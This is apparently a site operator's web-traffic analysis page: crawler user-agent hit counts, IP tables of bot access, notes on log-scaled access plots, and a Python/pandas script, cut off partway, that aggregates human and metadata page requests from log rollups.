Mozilla/5.0 (compatible; MJ12bot/v2.0.5; http://mj12bot.com/) 0 0 0 0 0 0 0 0 0 0 17 16 26 14 11 19 22 15 17 21 27 2
Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot) 7 1 1 1 3 3 3 7 4 3 9 4 12 16 14 9 15 22 15 20 21 5
Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot) 4 5 2 8 7 4 1 15 18 22 20 0 0 3 1 2 1 1 0 8 20 21
Googlebot/2.1 (+http://www.google.com/bot.html) 6 7 6 7 5 7 6 27 6 7 6 4 5 7 7 4 8 0 9 5 16 1
DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html) 4 2 3 0 6 4 0 8 8 3 4 10 20 9 7 14 0 15 13 7 11 4
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0 0 0 0 0 0 0 0 0 0 0 4 0 4 4 4 2 2 0 6 84 6 0
Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/) 10 16 4 4 4 0 0 6 6 0 3 3 2 4 2 7 2 2 3 21 2 2
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 0 0 0 0 0 0 0 58 18 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; AwarioBot/1.0; +https://awario.com/bots.html) 0 0 16 5 0 5 0 8 10 2 0 0 1 2 2 0 1 1 1 2 2 1
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 1 0 1 7 1 11 1 1 3 1 3 0 6 4 4 2 2 3 2 0 2 0
Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/) 2 0 0 4 3 0 0 2 10 0 1 4 0 2 3 4 0 2 5 4 3 0
Mozilla/5.0 (compatible; Googlebot/2.1; +https://www.google.com/bot.html) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 22 0 0 2 0 0 22 0
Mozilla/5.0 (compatible; DataForSeoBot/1.0; +https://dataforseo.com/dataforseo-bot) 9 0 0 0 0 13 9 0 0 0 0 0 5 0 0 0 0 0 4 0 0 0
Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler) 4 2 0 0 13 0 4 0 0 8 1 1 4 2 1 0 0 0 0 0 0 0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 0 0 0 0 33 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9) 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 1 21 3 3 0
Mozilla/5.0 (compatible; crawler) 1 0 0 0 0 0 0 0 12 5 8 0 0 0 0 0 0 0 0 1 0 2
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) 0 13 10 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1
Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html) 0 0 0 3 1 4 0 0 0 2 2 1 2 0 0 2 2 0 0 2 2 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/100.0.4896.127 Safari/537.36 0 0 0 0 0 2 8 4 0 1 0 0 0 0 0 1 1 0 3 2 1 0
Mozilla/5.0 (compatible; BacklinksExtendedBot) 0 0 0 0 0 4 0 4 0 0 0 0 0 0 0 4 4 0 2 0 1 0
ZoominfoBot (zoominfobot at zoominfo dot com) 0 0 0 0 0 0 0 0 0 0 8 0 0 0 0 5 3 2 0 0 0 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/142.0.0.0 Safari/537.36 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36 0 0 0 0 0 3 4 0 4 0 0 0 0 0 2 1 0 1 0 1 0 0
Mozilla/5.0 (compatible; Bingbot/2.0; +http://www.bing.com/bingbot.htm) 0 0 0 0 0 0 0 0 0 0 0 15 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; IbouBot/1.0; +bot@ibou.io; +https://ibou.io/iboubot.html) 13 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; Website-info.net-Robot; https://website-info.net/robot) 0 0 0 0 0 0 0 0 0 0 4 0 0 0 0 0 9 0 0 0 0 0
SEMrushBot 0 0 0 0 0 1 0 2 0 2 0 0 0 0 0 3 0 0 0 2 3 0
DnBCrawler-Analytics 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6 0 0 6 0 0 0
Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler) 0 0 0 0 0 0 0 0 0 2 2 1 0 2 2 3 0 0 0 0 0 0
Mozilla/5.0 (compatible; Pinterestbot/1.0; +http://www.pinterest.com/bot.html) 0 0 6 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 3 0 1
Pandalytics/2.0 (https://domainsbot.com/pandalytics/) 0 0 0 0 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 4 0
DomainStatsBot/1.0 (https://domainstats.com/pages/our-bot) 6 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/144.0.7559.132 Safari/537.36 0 0 0 0 0 0 0 0 0 0 8 0 2 0 0 0 0 0 0 0 0 0
2ip bot/1.1 (+https://2ip.io) 0 0 0 0 0 0 6 0 0 0 0 0 0 0 0 0 0 0 0 0 3 0
CCBot/2.0 (https://commoncrawl.org/faq/) 0 0 0 0 0 5 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.4 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.4 facebookexternalhit/1.1 Facebot Twitterbot/1.0 0 1 0 1 0 1 1 0 0 0 0 0 0 0 1 0 0 0 0 0 4 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/145.0.7632.116 Safari/537.36 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 5 0 0 2 0 0 0
Mozilla/5.0 (compatible; BingIndexCrawler/1.0) 0 0 0 0 0 0 0 0 0 0 0 2 0 0 1 0 3 1 1 0 0 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Perplexity-User/1.0; +https://perplexity.ai/perplexity-user) 0 2 3 0 0 2 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; Timpibot/0.8; +http://www.timpi.io) 0 0 0 0 0 0 0 0 0 0 2 0 0 1 0 0 0 0 0 0 4 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/143.0.7499.192 Safari/537.36 0 0 0 0 0 3 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0
RecordedFuture Global Inventory Crawler 0 0 0 1 0 0 0 0 0 2 0 0 0 1 0 0 1 0 0 2 0 0
Timpibot/1.0 (+http://timpi.io/crawler) 0 0 0 0 0 0 0 0 0 0 2 0 0 1 0 0 0 0 0 0 4 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ShapBot/0.1.0 0 2 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0
Mozilla/4.0 (compatible; fluid/0.0; +http://www.leak.info/bot.html) 0 1 0 0 0 1 0 0 0 0 1 0 0 1 0 0 0 0 1 0 0 0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Flyriverbot/1.1 (+https://www.flyriver.com/; AI Content Source Check) 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 2 0 0 0 1 0 0
Mozilla/5.0 (compatible; VelenPublicWebCrawler/1.0; +https://velen.io) 0 0 0 0 0 0 0 0 0 5 0 0 0 0 0 0 0 0 0 0 0 0
OI-Crawler/Nutch (https://openintel.nl/webcrawl/) 0 0 0 0 0 5 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.192 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) 0 0 0 0 0 2 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; MojeekBot/0.11; +https://www.mojeek.com/bot.html) 2 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 1 0 0 0
Mozilla/5.0 (compatible; SEOkicks; +https://www.seokicks.de/robot.html) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 0 0 0 0
Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 2 1
ChatGPT/1.2026.006 (Mac OS X 26.2; arm64; build 1768086529) 0 0 0 0 0 0 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.006 (iOS 26.2; iPhone18,1; build 20885802981) 0 0 0 0 0 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.048 (Mac OS X 26.3; arm64; build 1771630681) 0 0 0 0 0 0 0 0 0 0 3 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.055 (iOS 26.3.1; iPhone14,7; build 22511128209) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 3 0 0 0
GoogleBot/2.1 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 1 0 0 0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) 0 0 0 0 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (bot, like Gecko) Chrome/140.0.7339.210 Safari/537.36 0 0 0 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (adaptive-bot) 1 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 3 0 0 0 0 0 0 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Nicecrawler/1.1; +http://www.nicecrawler.com/) Chrome/90.0.4430.97 Safari/537.36 0 0 0 2 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0
ChatGPT/1.2025.350 (iOS 26.2; iPhone17,2; build 20387701780) 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2025.358 (iOS 26.1; iPhone18,2; build 20738352061) 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2025.358 (iOS 26.2; iPhone14,7; build 20738352061) 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.027 (iOS 18.7.2; iPad11,3; build 21538455626) 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.041 (Mac OS X 26.3; arm64; build 1771039076) 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0
DuckAssistBot/1.2; (+http://duckduckgo.com/duckassistbot.html) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; FinepdfsBot/1.0) 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; SaaSBrowserBot/1.0; +https://saasbrowser.com/bot) 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/141.0.7390.122 Safari/537.36 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Scrapy/2.13.4 (+https://scrapy.org) 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com) 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0
yacybot (/global; amd64 Linux 5.10.0-13-amd64; java 24.0.2; Etc/en) https://yacy.net/bot.html 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 0
ChatGPT/1.2025.328 (Windows_NT 10.0.26200; x86_64; build ) Electron/37.4.0 Chrome/138.0.7204.243 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2025.350 (Android 15; SM-A356E; build 2535707) 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2025.350 (Android 16; 24129PN74C; build 2535024) 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.013 (iOS 26.2.1; iPhone16,2; build 21084174615) 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.013 (iOS 26.2; iPhone18,1; build 21084174615) 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.027 (Mac OS X 26.2; arm64; build 1769832365) 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.027 (iOS 18.7.3; iPad15,4; build 21538455626) 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.027 (iOS 26.2.1; iPhone15,4; build 21538455626) 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.034 (iOS 18.6.2; iPhone14,5; build 21772720773) 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.041 (Android 14; 100146663; build 2604114) 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.041 (Mac OS X 26.2; arm64; build 1771039076) 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0
ChatGPT/1.2026.055 (Android 13; Nokia G21; build 2605516) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0
ChatGPT/1.2026.055 (Android 16; SM-M346B; build 2605516) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0
Facebot 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Googlebot/2.1 ( http://www.googlebot.com/bot.html) 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.132 Mobile Safari/537.36 (compatible; AdsBot-Google-Mobile; +http://www.google.com/mobile/adsbot.html) 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.159 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0
Mozilla/5.0 (Windows NT 6.1; Win64; x64; +http://url-classification.io/wiki/index.php?title=URL_server_crawler) KStandBot/1.0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; YandexFavicons/1.0; +http://yandex.com/bots) 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots) 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Scrapy/2.14.1 (+https://scrapy.org) 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
StormIntelCrawler/1.0 (StormIntel Crawler; http://stormintel.com; info@stormintel.com) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1
msnbot/0.11 ( http://search.msn.com/msnbot.htm) 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0

Top 20 IPs

verification

Table B (verification) - counts for IPs from the 2026-02-03 table (same log corpus; metadata-only)
IP address country / network diff history version titles touched user agent (representative)
216.73.216.213 TBD 2593 52 3909 44 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
66.249.70.70 TBD 3371 279 2611 209 Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; GoogleOther)
216.73.216.58 TBD 1431 228 2400 172 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
74.7.227.133 TBD 1502 15 2029 56 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.242.43 TBD 796 16 1163 39 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.71 TBD 1701 189 1036 193 Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; GoogleOther)
216.73.216.52 TBD 739 81 1012 107 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
74.7.242.14 TBD 697 10 844 41 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.64 TBD 1025 195 684 188 Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.7499.169 Mobile Safari/537.36 (compatible; GoogleOther)
74.7.241.52 TBD 571 8 660 46 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.227.134 TBD 431 6 651 30 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.62 TBD 256 57 397 120 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
216.73.216.40 TBD 177 51 299 108 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)
74.7.227.23 TBD 151 2 216 21 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.227.33 TBD 46 1 65 9 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)

older

Table A - machine access circa 2026-02-03
IP address country / network diff history version titles touched user agent (representative)
74.7.227.133 USA Verizon 1218 8 1632 14 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.70 USA Google LLC 1170 45 921 30 Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X)
74.7.242.43 Canada Rogers Communications 582 11 627 11 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.71 USA Google LLC 565 32 487 30 Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X)
216.73.216.52 USA Ohio Anthropic, PBC (AWS AS16509) 554 4 744 6 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.242.14 USA CA ISP 497 6 499 4 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.241.52 USA NY ISP 387 6 393 11 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
66.249.70.64 USA Google LLC 350 23 361 31 Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X)
74.7.227.134 USA Microsoft 321 5 433 5 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.213 USA Amazon 203 2 390 3 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.227.23 USA ISP 117 1 157 2 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.58 USA Amazon 106 5 174 3 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.62 USA Amazon 48 0 65 4 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
216.73.216.40 USA Amazon 41 3 65 2 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)
74.7.227.33 USA ISP 33 1 45 2 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)



2026-02-13 data projections

  • A Lomb-Scargle periodogram was investigated to check for periodicity

  • www page data access rates - shows the data egress time series

  • www accumulated data egress

2026-02-13 scatter plot projections

  • scatter plot including new metadata category (look at the projection mistakes in the File version history)

The model decided to:
  • redact titles to the top 50
  • clip the category labels at 80 characters when I said the category area was too wide (visually)
More invariants are therefore required to curb this recalcitrant behaviour. The counts below are wrong; it appears the model has included metadata access in the human counts.

2026-02-13 access lifetime projections

  • I was trialling metadata access filtering and sent bots away with a 429. The following graphlets show that effect:
    • Blue = Human page *_get_ok
    • Orange = Metadata *_get_ok only
    • MA(3) applied (centered, symmetric — removes the triangular daily artefacts)
    • Log amplitude = ln(1 + x)
    • H_AMP = 20
    • Mode A global scale = GLOBAL_MAX_LOG = 6.385
    • Lead capped at −10 days

  • MA(3) log

  • log amplitudes:
    • log transform to amplitudes using log1p(x) = ln(1+x), so zeros remain zero and low counts become visible.
      • Human is amplified before logging: H_log = log1p(H_AMP * HUMAN_MA)
      • Meta is logged directly: M_log = log1p(META_MA)
    • Then Mode A scaling uses a single global log scale GLOBAL_MAX_LOG = 5.758
  • Lead capped at −10 days.
  • Row spacing retained at 5.20 (no overlap; row_max=2.46).
  • Heading reports both: GLOBAL_MAX_LOG and H_AMP.
  • Run parameters (reported):
    • Lead_min = -10
    • GLOBAL_MAX_LOG = 5.758
    • H_AMP = 20
    • row_spacing = 5.20
    • row_max = 2.46
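The log-amplitude transform described above can be sketched deterministically. H_AMP and GLOBAL_MAX_LOG are the run parameters reported for this projection; the function name is illustrative:

```python
import numpy as np

H_AMP = 20              # human amplification applied before logging
GLOBAL_MAX_LOG = 5.758  # single global log scale (Mode A)

def to_log_amplitudes(human_ma, meta_ma):
    """log1p keeps zeros at zero and makes low counts visible;
    human is amplified by H_AMP before logging, meta is logged directly."""
    h_log = np.log1p(H_AMP * np.asarray(human_ma, dtype=float))
    m_log = np.log1p(np.asarray(meta_ma, dtype=float))
    # Mode A: one global scale shared by every row
    return h_log / GLOBAL_MAX_LOG, m_log / GLOBAL_MAX_LOG

h, m = to_log_amplitudes([0.0, 1.0, 10.0], [0.0, 1.0, 10.0])
```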

  • variable scale

  • fixed scale


code
import tarfile, re
from datetime import datetime, timezone
from urllib.parse import unquote
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from io import StringIO
from matplotlib.patches import Patch

def open_tar(path):
    return tarfile.open(path, mode="r:*")

# ---------- Load manifest ----------
with open_tar("/mnt/data/corpus.tgz") as tf:
    mpath = next(n for n in tf.getnames() if n.endswith("manifest.tsv"))
    manifest_text = tf.extractfile(mpath).read().decode("utf-8", errors="replace")

manifest = pd.read_csv(StringIO(manifest_text), sep="\t", dtype=str)

def find_col_ci(df, keys):
    low = {c.lower(): c for c in df.columns}
    for k in keys:
        if k.lower() in low:
            return low[k.lower()]
    return None

title_col = find_col_ci(manifest, ["title"]) or manifest.columns[0]
pub_col = find_col_ci(manifest, ["publication-date", "publication_date", "publication date"]) or (
    manifest.columns[2] if len(manifest.columns) >= 3 else None
)
if pub_col is None:
    raise RuntimeError(f"Publication date column not found. Manifest columns: {list(manifest.columns)}")

manifest["pub_dt"] = pd.to_datetime(manifest[pub_col], utc=True, errors="coerce")
manifest_pub = manifest.dropna(subset=["pub_dt"]).copy()

titles = manifest_pub[title_col].tolist()
pub_dt = dict(zip(manifest_pub[title_col], manifest_pub["pub_dt"]))

# ---------- Load rollups ----------
records = []
with open_tar("/mnt/data/rollups.tgz") as tf:
    for name in tf.getnames():
        if not name.endswith(".tsv"):
            continue
        base = name.split("/")[-1]
        prefix = base.split("-to-")[0]
        bstart = datetime.strptime(prefix, "%Y_%m_%dT%H_%MZ").replace(tzinfo=timezone.utc)
        df = pd.read_csv(tf.extractfile(name), sep="\t")
        df["bucket_start"] = bstart
        records.append(df)

rollups = pd.concat(records, ignore_index=True)

colmap = {c.lower(): c for c in rollups.columns}
path_col = colmap["path"]
human_col = colmap["human_get_ok"]
meta_cols = [c for c in rollups.columns if re.match(r".*_get_.*", c, re.I)]

def norm_title(t):
    t = unquote(str(t))
    t = t.replace("_", " ")
    t = re.sub(r"[–—]", "-", t)
    t = re.sub(r"\s+", " ", t).strip()
    return t

def classify(path):
    if not isinstance(path, str):
        return None, None
    p = unquote(path)
    if "/pub-meta/" in p or "-meta/" in p:
        return norm_title(p.split("/")[-1]), "meta"
    if p.startswith("/pub/"):
        return norm_title(p[len("/pub/"):]), "page"
    return None, None

tmp = rollups[path_col].apply(lambda p: pd.Series(classify(p)))
tmp.columns = ["title", "kind"]
rollups = pd.concat([rollups, tmp], axis=1)
rollups = rollups[rollups["title"].isin(titles)].copy()

rollups["day"] = pd.to_datetime(rollups["bucket_start"], utc=True).dt.floor("D")
rollups[human_col] = pd.to_numeric(rollups[human_col], errors="coerce").fillna(0.0)
for c in meta_cols:
    rollups[c] = pd.to_numeric(rollups[c], errors="coerce").fillna(0.0)

# totals for labels
tot_h = rollups[rollups["kind"] == "page"].groupby("title")[human_col].sum()
meta_tmp = rollups[rollups["kind"] == "meta"].copy()
meta_tmp["meta"] = meta_tmp[meta_cols].sum(axis=1)
tot_m = meta_tmp.groupby("title")["meta"].sum()

# daily aggregates
page = (
    rollups[rollups["kind"] == "page"]
    .groupby(["title", "day"], as_index=False)[human_col]
    .sum()
    .rename(columns={human_col: "human"})
)
meta = meta_tmp.groupby(["title", "day"], as_index=False)["meta"].sum()
daily = pd.merge(page, meta, on=["title", "day"], how="outer").fillna(0.0)

global_days = pd.date_range(daily["day"].min(), daily["day"].max(), freq="D", tz="UTC")

# ---------- Build series ----------
MA_N = 7
H_AMP = 10
ROW_MAX = 0.42  # per-title visual excursion in row-units

rows = []
max_by_title = {}

for t in titles:
    pub = pub_dt[t]
    d = (
        daily[daily["title"] == t]
        .set_index("day")[["human", "meta"]]
        .reindex(global_days, fill_value=0.0)
    )
    ma_h = d["human"].rolling(MA_N, min_periods=1).mean().values.astype(float)
    ma_m = d["meta"].rolling(MA_N, min_periods=1).mean().values.astype(float)
    rel = ((d.index - pub.normalize()).days).astype(int)

    disp_h = H_AMP * ma_h
    disp_m = ma_m
    mx = float(np.nanmax(np.maximum(disp_h, disp_m))) if len(disp_h) else 0.0
